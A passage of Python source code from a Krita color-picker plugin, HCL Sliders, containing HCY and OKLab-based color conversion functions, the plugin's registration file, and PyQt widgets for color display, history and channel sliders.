# calculate upper limit of chroma for hue and luma pair
u = y / yHue if y <= yHue else (1 - y) / (1 - yHue)
return (round(h * 60, 2), round(c * 100, 3), round(y * 100, 2), round(u * 100, 3))
@staticmethod
def hcyToRgbF(h: float, c: float, y: float, u: float, trc: str, luma: bool):
# derive hue in 60deg sectors
h /= 60
hSector = int(h)
# pass in y and u as -1 for max chroma conversions
if y != -1:
# scale luma to 1
y /= 100
if c == 0 or y == 0 or y == 1:
# if y is always luma, convert to linear
if luma and trc == "linear":
y = Convert.componentToLinear(y)
# luma coefficients add up to 1
return (y, y, y)
# calculate deviation from closest primary color with range of -0.999... to 0.999...
# |deviation| = 1 - derived hue - hue sector if deviation is negative
# |deviation| = derived hue - hue sector if deviation is positive
d = h - hSector if hSector % 2 == 0 else 1 - (h - hSector)
# calculate luma coefficient of hue
yHue = 0
if hSector == 1: # between yellow and green
yHue = Y709G + Y709R * d
elif hSector == 2: # between green and cyan
yHue = Y709G + Y709B * d
elif hSector == 3: # between cyan and blue
yHue = Y709B + Y709G * d
elif hSector == 4: # between blue and magenta
yHue = Y709B + Y709R * d
elif hSector == 5: # between magenta and red
yHue = Y709R + Y709B * d
else: # between red and yellow
yHue = Y709R + Y709G * d
# when chroma is at maximum, y = luma coefficient of hue
if y == -1:
y = yHue
# it is not always possible for chroma to be constant when adjusting hue or luma
# adjustment have to either clip chroma or have consistent saturation instead
cMax = y / yHue if y <= yHue else (1 - y) / (1 - yHue)
if u == -1:
# scale chroma to 1 before comparing
c /= 100
# clip chroma to new limit
if c > cMax:
c = cMax
else:
# scale chroma to hue or luma adjustment
s = 0
if u:
s = c / u
c = s * cMax
# luma = max(R,G,B) * yHue + min(R,G,B) * (1 - yHue)
# calculate min(R,G,B) based on the equation above
m = y - c * yHue
# med(R,G,B) = min(R,G,B) + (|deviation| * chroma)
x = y - c * (yHue - d)
# max(R,G,B) = min(R,G,B) + chroma
v = y + c * (1 - yHue)
# if y is always luma, hsector to rgbf needs trc param
if luma:
return Convert.hSectorToRgbF(hSector, v, m, x, trc)
return Convert.hSectorToRgbF(hSector, v, m, x)
@staticmethod
def rgbFToOkhcl(r: float, g: float, b: float, h: float, trc: str):
# if rgb not linear, convert to linear for oklab conversion
if trc == "sRGB":
r = Convert.componentToLinear(r)
g = Convert.componentToLinear(g)
b = Convert.componentToLinear(b)
oklab = Convert.linearToOklab(r, g, b)
l = oklab[0]
ch = Convert.cartesianToPolar(oklab[1], oklab[2])
c = ch[0]
# chroma of neutral colors will not be exactly 0 due to floating point errors
if c < 0.000001:
# use current hue to calulate chroma limit in sRGB gamut for neutral colors
ab = Convert.polarToCartesian(1, h)
cuspLC = Convert.findCuspLC(*ab)
u = Convert.findGamutIntersection(*ab, l, 1, l, cuspLC)
u /= cuspLC[1]
c = 0
else:
# gamut intersection jumps for parts of blue
h = ch[1] if not 264.052 < ch[1] < 264.06 else 264.06
# a and b must be normalized to c = 1 to calculate chroma limit in sRGB gamut
a_ = oklab[1] / c
b_ = oklab[2] / c
cuspLC = Convert.findCuspLC(a_, b_)
u = Convert.findGamutIntersection(a_, b_, l, 1, l, cuspLC)
if c > u:
c = u
u /= cuspLC[1]
c /= cuspLC[1]
l = Convert.toe(l)
return (round(h, 2), round(c * 100, 3), round(l * 100, 2), round(u * 100, 3))
@staticmethod
def okhclToRgbF(h: float, c: float, l: float, u: float, trc: str):
# convert lref back to okL
l = Convert.toeInv(l / 100)
# clip chroma if exceed sRGB gamut
ab = (0, 0)
if c:
ab = Convert.polarToCartesian(1, h)
cuspLC = Convert.findCuspLC(*ab)
cMax = Convert.findGamutIntersection(*ab, l, 1, l, cuspLC)
if u == -1:
c = c / 100 * cuspLC[1]
if c > cMax:
c = cMax
else:
s = c / u
c = s * cMax
ab = Convert.polarToCartesian(c, h)
rgb = Convert.oklabToLinear(l, *ab)
# perform transfer functions for components if output to sRGB
r = Convert.componentToSRGB(rgb[0]) if trc == "sRGB" else rgb[0]
g = Convert.componentToSRGB(rgb[1]) if trc == "sRGB" else rgb[1]
b = Convert.componentToSRGB(rgb[2]) if trc == "sRGB" else rgb[2]
return (Convert.clampF(r), Convert.clampF(g), Convert.clampF(b))
@staticmethod
def rgbFToOkhsv(r: float, g: float, b: float, trc: str):
# if rgb not linear, convert to linear for oklab conversion
if trc == "sRGB":
r = Convert.componentToLinear(r)
g = Convert.componentToLinear(g)
b = Convert.componentToLinear(b)
oklab = Convert.linearToOklab(r, g, b)
l = oklab[0]
ch = Convert.cartesianToPolar(oklab[1], oklab[2])
c = ch[0]
# chroma of neutral colors will not be exactly 0 due to floating point errors
if c < 0.000001:
return (0, 0, round(Convert.toe(l) * 100, 2))
else:
# gamut intersection jumps for parts of blue
h = ch[1] if not 264.052 < ch[1] < 264.06 else 264.06
# a and b must be normalized to c = 1 to calculate chroma limit in sRGB gamut
a_ = oklab[1] / c
b_ = oklab[2] / c
cuspLC = Convert.findCuspLC(a_, b_)
st = Convert.cuspToST(cuspLC)
sMax = st[0]
tMax = st[1]
s0 = 0.5
k = 1 - s0 / sMax
# first we find L_v, C_v, L_vt and C_vt
t = tMax / (c + l * tMax)
l_v = t * l
c_v = t * c
l_vt = Convert.toeInv(l_v)
c_vt = c_v * l_vt / l_v
# we can then use these to invert the step that compensates for the toe
# and the curved top part of the triangle:
rgbScale = Convert.oklabToLinear(l_vt, a_ * c_vt, b_ * c_vt)
scaleL = (1 / max(rgbScale[0], rgbScale[1], rgbScale[2])) ** (1 / 3)
l = Convert.toe(l / scaleL)
# // we can now compute v and s:
v = l / l_v
s = (s0 + tMax) * c_v / ((tMax * s0) + tMax * k * c_v)
if s > 1:
s = 1.0
return (round(h, 2), round(s * 100, 2), round(v * 100, 2))
@staticmethod
def okhsvToRgbF(h: float, s: float, v: float, trc: str):
# scale saturation and value range from 0-100 to 0-1
s /= 100
v /= 100
rgb = None
if v == 0:
return (0, 0, 0)
elif s == 0:
rgb = Convert.oklabToLinear(Convert.toeInv(v), 0, 0)
else:
ab = Convert.polarToCartesian(1, h)
cuspLC = Convert.findCuspLC(*ab)
st = Convert.cuspToST(cuspLC)
sMax = st[0]
tMax = st[1]
s0 = 0.5
k = 1 - s0 / sMax
# first we compute L and V as if the gamut is a perfect triangle:
# L, C when v==1:
l_v = 1 - s * s0 / (s0 + tMax - tMax * k * s)
c_v = s * tMax * s0 / (s0 + tMax - tMax * k * s)
l = v * l_v
c = v * c_v
# then we compensate for both toe and the curved top part of the triangle:
l_vt = Convert.toeInv(l_v)
c_vt = c_v * l_vt / l_v
l_new = Convert.toeInv(l)
c *= l_new / l
l = l_new
rgbScale = Convert.oklabToLinear(l_vt, ab[0] * c_vt, ab[1] * c_vt)
scaleL = (1 / max(rgbScale[0], rgbScale[1], rgbScale[2])) ** (1 / 3)
l *= scaleL
c *= scaleL
rgb = Convert.oklabToLinear(l, ab[0] * c, ab[1] * c)
# perform transfer functions for components if output to sRGB
r = Convert.componentToSRGB(rgb[0]) if trc == "sRGB" else rgb[0]
g = Convert.componentToSRGB(rgb[1]) if trc == "sRGB" else rgb[1]
b = Convert.componentToSRGB(rgb[2]) if trc == "sRGB" else rgb[2]
return (Convert.clampF(r), Convert.clampF(g), Convert.clampF(b))
@staticmethod
def rgbFToOkhsl(r: float, g: float, b: float, trc: str):
# if rgb not linear, convert to linear for oklab conversion
if trc == "sRGB":
r = Convert.componentToLinear(r)
g = Convert.componentToLinear(g)
b = Convert.componentToLinear(b)
oklab = Convert.linearToOklab(r, g, b)
l = oklab[0]
ch = Convert.cartesianToPolar(oklab[1], oklab[2])
s = 0
c = ch[0]
# chroma of neutral colors will not be exactly 0 due to floating point errors
if c >= 0.000001:
a_ = oklab[1] / c
b_ = oklab[2] / c
cs = Convert.getCs(l, a_, b_)
c0 = cs[0]
cMid = cs[1]
cMax = cs[2]
# Inverse of the interpolation in okhsl_to_srgb:
mid = 0.8
midInv = 1.25
if c < cMid:
k1 = mid * c0
k2 = 1 - k1 / cMid
t = c / (k1 + k2 * c)
s = t * mid
else:
k1 = (1 - mid) * cMid * cMid * midInv * midInv / c0
k2 = 1 - k1 / (cMax - cMid)
t = (c - cMid) / (k1 + k2 * (c - cMid))
s = mid + (1 - mid) * t
# gamut intersection jumps for parts of blue
h = ch[1] if not 264.052 < ch[1] < 264.06 else 264.06
l = Convert.toe(l)
return (round(h, 2), round(s * 100, 2), round(l * 100, 2))
@staticmethod
def okhslToRgbF(h: float, s: float, l: float, trc: str):
# scale saturation and lightness range from 0-100 to 0-1
s /= 100
l /= 100
if l == 0 or l == 1:
return (l, l, l)
ab = Convert.polarToCartesian(1, h)
l = Convert.toeInv(l)
c = 0
if s:
cs = Convert.getCs(l, *ab)
c0 = cs[0]
cMid = cs[1]
cMax = cs[2]
# Interpolate the three values for C so that:
# At s=0: dC/ds = C_0, C=0
# At s=0.8: C=C_mid
# At s=1.0: C=C_max
mid = 0.8
midInv = 1.25
if s < mid:
t = midInv * s
k1 = mid * c0
k2 = 1 - k1 / cMid
c = t * k1 / (1 - k2 * t)
else:
t = (s - mid) / (1 - mid)
k1 = (1 - mid) * cMid * cMid * midInv * midInv / c0
k2 = 1 - k1 / (cMax - cMid)
c = cMid + t * k1 / (1 - k2 * t)
rgb = Convert.oklabToLinear(l, ab[0] * c, ab[1] * c)
# perform transfer functions for components if output to sRGB
r = Convert.componentToSRGB(rgb[0]) if trc == "sRGB" else rgb[0]
g = Convert.componentToSRGB(rgb[1]) if trc == "sRGB" else rgb[1]
b = Convert.componentToSRGB(rgb[2]) if trc == "sRGB" else rgb[2]
return (Convert.clampF(r), Convert.clampF(g), Convert.clampF(b))
| 39,439 | Python | .py | 923 | 32.548212 | 99 | 0.526123 | lucifer9683/HCLSliders | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,181 | __init__.py | lucifer9683_HCLSliders/hclsliders/__init__.py | # SPDX-License-Identifier: GPL-3.0-or-later
#
# HCL Sliders is a Krita plugin for color selection.
# Copyright (C) 2024 Lucifer <krita-artists.org/u/Lucifer>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from krita import DockWidgetFactory, DockWidgetFactoryBase
from .hclsliders import HCLSliders
DOCKER_ID = 'pykrita_hclsliders'
instance = Krita.instance()
dock_widget_factory = DockWidgetFactory(DOCKER_ID,
DockWidgetFactoryBase.DockRight,
HCLSliders)
instance.addDockWidgetFactory(dock_widget_factory)
| 1,181 | Python | .py | 25 | 42.88 | 72 | 0.746528 | lucifer9683/HCLSliders | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,182 | hclsliders.py | lucifer9683_HCLSliders/hclsliders/hclsliders.py | # SPDX-License-Identifier: GPL-3.0-or-later
#
# HCL Sliders is a Krita plugin for color selection.
# Copyright (C) 2024 Lucifer <krita-artists.org/u/Lucifer>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# This file incorporates work covered by the following copyright and
# permission notice:
#
# Pigment.O is a Krita plugin and it is a Color Picker and Color Mixer.
# Copyright ( C ) 2020 Ricardo Jeremias.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# ( at your option ) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from PyQt5.QtCore import Qt, pyqtSignal, QTimer, QSize
from PyQt5.QtGui import QPainter, QBrush, QColor, QLinearGradient, QPixmap, QIcon
from PyQt5.QtWidgets import (QWidget, QVBoxLayout, QHBoxLayout, QDoubleSpinBox, QLabel, QLineEdit,
QPushButton, QListWidget, QListWidgetItem, QDialog, QStackedWidget,
QTabWidget, QCheckBox, QGroupBox, QRadioButton, QSpinBox)
from krita import DockWidget, ManagedColor
from .colorconversion import Convert
DOCKER_NAME = 'HCL Sliders'
# adjust plugin sizes and update timing here
TIME = 100 # ms time for plugin to update color from krita, faster updates may make krita slower
DELAY = 300 # ms delay updating color history to prevent flooding when using the color picker
DISPLAY_HEIGHT = 25 # px for color display panel at the top
CHANNEL_HEIGHT = 19 # px for channels, also influences hex/ok syntax box and buttons
MODEL_SPACING = 6 # px for spacing between color models
HISTORY_HEIGHT = 16 # px for color history and area of each color box
VALUES_WIDTH = 63 # px for spinboxes containing channel values
LABEL_WIDTH = 11 # px for spacing of channel indicator/letter
# adjust various sizes of config menu
CONFIG_SIZE = (468, 230) # (width in px, height in px) size for config window
SIDEBAR_WIDTH = 76 # px for sidebar containing channel selection and others button
GROUPBOX_HEIGHT = 64 # px for groupboxes of cursor snapping, chroma mode and color history
SPINBOX_WIDTH = 72 # px for spinboxes of interval, displacement and memory
OTHERS_HEIGHT = 12 # px for spacing before color history in others page
# compatible color profiles in krita
SRGB = ('sRGB-elle-V2-srgbtrc.icc', 'sRGB built-in',
'Gray-D50-elle-V2-srgbtrc.icc', 'Gray-D50-elle-V4-srgbtrc.icc')
LINEAR = ('sRGB-elle-V2-g10.icc', 'krita-2.5, lcms sRGB built-in with linear gamma TRC',
'Gray-D50-elle-V2-g10.icc', 'Gray-D50-elle-V4-g10.icc')
NOTATION = ('HEX', 'OKLAB', 'OKLCH')
class ColorDisplay(QWidget):
def __init__(self, parent):
super().__init__(parent)
self.hcl = parent
self.current = None
self.recent = None
self.foreground = None
self.background = None
self.temp = None
self.bgMode = False
self.switchToolTip()
def setCurrentColor(self, color=None):
self.current = color
self.update()
def setForeGroundColor(self, color=None):
self.foreground = color
self.update()
def setBackGroundColor(self, color=None):
self.background = color
self.update()
def setTempColor(self, color=None):
self.temp = color
self.update()
def resetColors(self):
self.current = None
self.recent = None
self.foreground = None
self.background = None
self.temp = None
self.update()
def isChanged(self):
if self.current is None:
return True
if self.bgMode:
if self.current.components() != self.background.components():
return True
if self.current.colorModel() != self.background.colorModel():
return True
if self.current.colorDepth() != self.background.colorDepth():
return True
if self.current.colorProfile() != self.background.colorProfile():
return True
else:
if self.current.components() != self.foreground.components():
return True
if self.current.colorModel() != self.foreground.colorModel():
return True
if self.current.colorDepth() != self.foreground.colorDepth():
return True
if self.current.colorProfile() != self.foreground.colorProfile():
return True
return False
def isChanging(self):
if self.recent is None:
return False
if self.recent.components() != self.current.components():
return True
if self.recent.colorModel() != self.current.colorModel():
return True
if self.recent.colorDepth() != self.current.colorDepth():
return True
if self.recent.colorProfile() != self.current.colorProfile():
return True
return False
def switchToolTip(self):
if self.bgMode:
self.setToolTip("Background Color")
else:
self.setToolTip("Foreground Color")
def switchMode(self):
self.bgMode = not self.bgMode
self.switchToolTip()
self.update()
def mousePressEvent(self, event):
self.setFocus()
self.switchMode()
def paintEvent(self, event):
painter = QPainter(self)
painter.setPen(Qt.PenStyle.NoPen)
width = self.width()
halfwidth = round(width / 2.0)
height = self.height()
# foreground/background color from krita
if self.foreground and not self.bgMode:
painter.setBrush(QBrush(self.foreground.colorForCanvas(self.hcl.canvas())))
elif self.background and self.bgMode:
painter.setBrush(QBrush(self.background.colorForCanvas(self.hcl.canvas())))
else:
painter.setBrush( QBrush(QColor(0, 0, 0)))
painter.drawRect(0, 0, width, height)
# current color from sliders
if self.current:
painter.setBrush(QBrush(self.current.colorForCanvas(self.hcl.canvas())))
if self.bgMode:
painter.drawRect(halfwidth, 0, width - halfwidth, height)
else:
painter.drawRect(0, 0, halfwidth, height)
# indicator for picking past color in other mode
if self.temp:
painter.setBrush(QBrush(self.temp.colorForCanvas(self.hcl.canvas())))
if self.bgMode:
painter.drawRect(0, 0, halfwidth, height)
else:
painter.drawRect(halfwidth, 0, width - halfwidth, height)
class ColorHistory(QListWidget):
def __init__(self, hcl, parent=None):
super().__init__(parent)
# should not pass in hcl as parent if it can be hidden
self.hcl = hcl
self.index = -1
self.modifier = None
self.start = 0
self.position = 0
self.setFlow(QListWidget.Flow.LeftToRight)
self.setFixedHeight(HISTORY_HEIGHT)
self.setViewportMargins(-2, 0, 0, 0)
# grid width + 2 to make gaps between swatches
self.setGridSize(QSize(HISTORY_HEIGHT + 2, HISTORY_HEIGHT))
self.setUniformItemSizes(True)
self.setVerticalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOff)
self.setHorizontalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOff)
self.setHorizontalScrollMode(QListWidget.ScrollMode.ScrollPerPixel)
self.setSelectionMode(QListWidget.SelectionMode.NoSelection)
def startScrollShift(self, event):
self.start = self.horizontalScrollBar().value()
self.position = event.x()
def keyPressEvent(self, event):
# disable keyboard interactions
pass
def mousePressEvent(self, event):
self.hcl.setPressed(True)
item = self.itemAt(event.pos())
index = self.row(item)
if index != -1:
if (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.NoModifier):
color = self.hcl.makeManagedColor(*self.hcl.pastColors[index])
if color:
if self.hcl.color.bgMode:
self.hcl.color.setTempColor(color)
else:
self.hcl.color.setCurrentColor(color)
self.index = index
self.modifier = Qt.KeyboardModifier.NoModifier
elif (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.ControlModifier):
color = self.hcl.makeManagedColor(*self.hcl.pastColors[index])
if color:
if self.hcl.color.bgMode:
self.hcl.color.setCurrentColor(color)
else:
self.hcl.color.setTempColor(color)
self.index = index
self.modifier = Qt.KeyboardModifier.ControlModifier
elif (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.AltModifier):
self.index = index
self.modifier = Qt.KeyboardModifier.AltModifier
self.startScrollShift(event)
def mouseMoveEvent(self, event):
if (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.ShiftModifier):
position = 0
bar = self.horizontalScrollBar()
if bar.maximum():
# speed of grid width squared seems good
speed = (HISTORY_HEIGHT + 2) ** 2
# move bar at constant speed
shift = float(self.position - event.x()) / self.width()
position = round(self.start + shift * speed)
bar.setValue(position)
else:
self.startScrollShift(event)
def mouseReleaseEvent(self, event):
item = self.itemAt(event.pos())
index = self.row(item)
if index == self.index and index != -1:
if (event.modifiers() == Qt.KeyboardModifier.NoModifier and
self.modifier == Qt.KeyboardModifier.NoModifier):
self.hcl.setPastColor(index)
elif (event.modifiers() == Qt.KeyboardModifier.ControlModifier and
self.modifier == Qt.KeyboardModifier.ControlModifier):
self.hcl.setPastColor(index, False)
if (event.modifiers() == Qt.KeyboardModifier.AltModifier and
self.modifier == Qt.KeyboardModifier.AltModifier):
if self.index != -1 and index != -1 :
start = index
stop = self.index
if self.index > index:
start = self.index
stop = index
for i in range(start, stop - 1, -1):
self.takeItem(i)
self.hcl.pastColors.pop(i)
if self.modifier == Qt.KeyboardModifier.NoModifier and self.index != -1:
if self.hcl.color.bgMode:
self.hcl.color.setTempColor()
else:
# prevent setHistory when krita fg color not changed
self.hcl.color.current = self.hcl.color.foreground
elif self.modifier == Qt.KeyboardModifier.ControlModifier and self.index != -1:
if self.hcl.color.bgMode:
# prevent setHistory when krita bg color not changed
self.hcl.color.current = self.hcl.color.background
else:
self.hcl.color.setTempColor()
self.modifier = None
self.index = -1
self.hcl.setPressed(False)
class ChannelSlider(QWidget):
valueChanged = pyqtSignal(float)
mousePressed = pyqtSignal(bool)
def __init__(self, limit: float, parent=None):
super().__init__(parent)
self.value = 0.0
self.limit = limit
self.interval = 0.1
self.displacement = 0
self.start = 0.0
self.position = 0
self.shift = 0.1
self.colors = []
def setGradientColors(self, colors: list):
if self.colors:
self.colors = []
for rgb in colors:
# using rgbF as is may result in black as colors are out of gamut
color = QColor(*rgb)
self.colors.append(color)
self.update()
def setValue(self, value: float):
self.value = value
self.update()
def setLimit(self, value: float):
self.limit = value
self.update()
def setInterval(self, interval: float):
limit = 100.0 if self.limit < 360 else 360.0
if interval < 0.1:
interval = 0.1
elif interval > limit:
interval = limit
self.interval = interval
def setDisplacement(self, displacement: float):
limit = 99.9 if self.limit < 360 else 359.9
if displacement < 0:
displacement = 0
elif displacement > limit:
displacement = limit
self.displacement = displacement
def emitValueChanged(self, event):
position = event.x()
width = self.width()
if position > width:
position = width
elif position < 0:
position = 0.0
self.value = round((position / width) * self.limit, 3)
self.valueChanged.emit(self.value)
self.mousePressed.emit(True)
def emitValueSnapped(self, event):
position = event.x()
width = self.width()
if position > width:
position = width
elif position < 0:
position = 0.0
value = round((position / width) * self.limit, 3)
if value != 0 and value != self.limit:
interval = self.interval if self.interval != 0 else self.limit
if self.limit < 100:
interval = (self.interval / 100) * self.limit
displacement = (value - self.displacement) % interval
if displacement < interval / 2:
value -= displacement
else:
value += interval - displacement
if value > self.limit:
value = self.limit
elif value < 0:
value = 0.0
self.value = value
self.valueChanged.emit(self.value)
self.mousePressed.emit(True)
def startValueShift(self, event):
self.start = self.value
self.position = event.x()
def emitValueShifted(self, event):
position = event.x()
vector = position - self.position
value = self.start + (vector * self.shift)
if value < 0:
if self.limit == 360:
value += self.limit
else:
value = 0
elif value > self.limit:
if self.limit == 360:
value -= self.limit
else:
value = self.limit
self.value = value
self.valueChanged.emit(self.value)
self.mousePressed.emit(True)
def mousePressEvent(self, event):
if (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.NoModifier):
self.emitValueChanged(event)
elif (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.ControlModifier):
self.emitValueSnapped(event)
self.startValueShift(event)
self.update()
def mouseMoveEvent(self, event):
if (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.NoModifier):
self.emitValueChanged(event)
self.startValueShift(event)
elif (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.ControlModifier):
self.emitValueSnapped(event)
self.startValueShift(event)
elif (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.ShiftModifier):
self.shift = 0.1
self.emitValueShifted(event)
elif (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.AltModifier):
self.shift = 0.01
self.emitValueShifted(event)
self.update()
def mouseReleaseEvent(self, event):
self.mousePressed.emit(False)
def paintEvent(self, event):
painter = QPainter(self)
width = self.width()
height = self.height()
# background
painter.setPen(Qt.PenStyle.NoPen)
painter.setBrush( QBrush(QColor(0, 0, 0, 50)))
painter.drawRect(0, 1, width, height - 2)
# gradient
gradient = QLinearGradient(0, 0, width, 0)
if self.colors:
for index, color in enumerate(self.colors):
gradient.setColorAt(index / (len(self.colors) - 1), color)
painter.setBrush(QBrush(gradient))
painter.drawRect(1, 2, width - 2, height - 4)
# cursor
if self.limit:
position = round((self.value / self.limit) * (width - 2))
painter.setBrush( QBrush(QColor(0, 0, 0, 100)))
painter.drawRect(position - 2, 0, 6, height)
painter.setBrush(QBrush(QColor(255, 255, 255, 200)))
painter.drawRect(position, 1, 2, height - 2)
class ColorChannel:
channelList = None
def __init__(self, name: str, parent):
self.name = name
self.update = parent.updateChannels
self.refresh = parent.updateChannelGradients
wrap = False
interval = 10.0
displacement = 0.0
self.scale = True
self.clip = 0.0
self.colorful = False
self.luma = False
self.limit = 100.0
if self.name[-3:] == "Hue":
wrap = True
interval = 30.0
if self.name[:2] == "ok":
interval = 40.0
displacement = 25.0
self.limit = 360.0
elif self.name[-6:] == "Chroma":
self.limit = 0.0
self.layout = QHBoxLayout()
self.layout.setSpacing(2)
if self.name[:2] == "ok":
tip = f"{self.name[:5].upper()} {self.name[5:]}"
letter = self.name[5:6]
else:
tip = f"{self.name[:3].upper()} {self.name[3:]}"
if self.name[-4:] == "Luma":
letter = "Y"
else:
letter = self.name[3:4]
self.label = QLabel(letter)
self.label.setFixedHeight(CHANNEL_HEIGHT - 1)
self.label.setFixedWidth(LABEL_WIDTH)
self.label.setAlignment(Qt.AlignmentFlag.AlignCenter)
self.label.setToolTip(tip)
self.slider = ChannelSlider(self.limit)
self.slider.setFixedHeight(CHANNEL_HEIGHT)
self.slider.setMinimumWidth(100)
self.slider.setInterval(interval)
self.slider.setDisplacement(displacement)
self.slider.mousePressed.connect(parent.setPressed)
self.spinBox = QDoubleSpinBox()
if self.name[-6:] == "Chroma":
self.spinBox.setDecimals(3)
self.spinBox.setMaximum(self.limit)
self.spinBox.setWrapping(wrap)
self.spinBox.setFixedHeight(CHANNEL_HEIGHT)
self.spinBox.setFixedWidth(VALUES_WIDTH)
self.spinBox.editingFinished.connect(parent.finishEditing)
self.slider.valueChanged.connect(self.updateSpinBox)
self.spinBox.valueChanged.connect(self.updateSlider)
ColorChannel.updateList(name)
def value(self):
return self.spinBox.value()
def setValue(self, value: float):
if self.name[-6:] == "Chroma" and self.limit >= 10:
value = round(value, 2)
self.slider.setValue(value)
self.spinBox.setValue(value)
def setLimit(self, value: float):
decimal = 2 if value >= 10 else 3
self.limit = round(value, decimal)
self.slider.setLimit(self.limit)
self.spinBox.setDecimals(decimal)
self.spinBox.setMaximum(self.limit)
self.spinBox.setSingleStep(self.limit / 100)
def clipChroma(self, clip: bool):
# do not set chroma channel itself to clip as the clip value will not be updated when adjusting
self.scale = not clip
self.refresh()
def colorfulHue(self, colorful: bool):
self.colorful = colorful
self.refresh()
def updateSlider(self, value: float):
self.update(value, self.name, "slider")
def updateSpinBox(self, value: float):
self.update(value, self.name, "spinBox")
def updateGradientColors(self, firstConst: float, lastConst: float, trc: str, ChromaLimit: float=-1):
colors = []
if self.name[-3:] == "Hue":
if self.name[:2] == "ok":
# oklab hue needs more points for qcolor to blend more accurately
# range of 0 to 25 - 345 in 15deg increments to 360
points = 26
increment = self.limit / (points - 2)
displacement = increment - 25
if self.colorful:
for number in range(points):
hue = (number - 1) * increment - displacement
if hue < 0:
hue = 0
elif hue > self.limit:
hue = self.limit
rgb = Convert.okhsvToRgbF(hue, 100.0, 100.0, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:5] == "okhcl":
for number in range(points):
hue = (number - 1) * increment - displacement
if hue < 0:
hue = 0
elif hue > self.limit:
hue = self.limit
rgb = Convert.okhclToRgbF(hue, firstConst, lastConst, ChromaLimit, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:5] == "okhsv":
for number in range(points):
hue = (number - 1) * increment - displacement
if hue < 0:
hue = 0
elif hue > self.limit:
hue = self.limit
rgb = Convert.okhsvToRgbF(hue, firstConst, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:5] == "okhsl":
for number in range(points):
hue = (number - 1) * increment - displacement
if hue < 0:
hue = 0
elif hue > self.limit:
hue = self.limit
rgb = Convert.okhslToRgbF(hue, firstConst, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
else:
# range of 0 to 360deg incrementing by 30deg
points = 13
increment = self.limit / (points - 1)
if self.colorful:
if self.name[:3] != "hcy":
for number in range(points):
rgb = Convert.hsvToRgbF(number * increment, 100.0, 100.0, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
else:
for number in range(points):
rgb = Convert.hcyToRgbF(number * increment, 100.0, -1, -1, trc, self.luma)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:3] == "hsv":
for number in range(points):
rgb = Convert.hsvToRgbF(number * increment, firstConst, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:3] == "hsl":
for number in range(points):
rgb = Convert.hslToRgbF(number * increment, firstConst, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:3] == "hcy":
for number in range(points):
rgb = Convert.hcyToRgbF(number * increment, firstConst, lastConst,
ChromaLimit, trc, self.luma)
colors.append(Convert.rgbFToInt8(*rgb, trc))
else:
# range of 0 to 100% incrementing by 10%
points = 11
increment = self.limit / (points - 1)
if self.name[:3] == "hsv":
if self.name[3:] == "Saturation":
for number in range(points):
rgb = Convert.hsvToRgbF(firstConst, number * increment, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[3:] == "Value":
for number in range(points):
rgb = Convert.hsvToRgbF(firstConst, lastConst, number * increment, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:3] == "hsl":
if self.name[3:] == "Saturation":
for number in range(points):
rgb = Convert.hslToRgbF(firstConst, number * increment, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[3:] == "Lightness":
for number in range(points):
rgb = Convert.hslToRgbF(firstConst, lastConst, number * increment, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:3] == "hcy":
if self.name[3:] == "Chroma":
for number in range(points):
rgb = Convert.hcyToRgbF(firstConst, number * increment, lastConst,
ChromaLimit, trc, self.luma)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[3:] == "Luma":
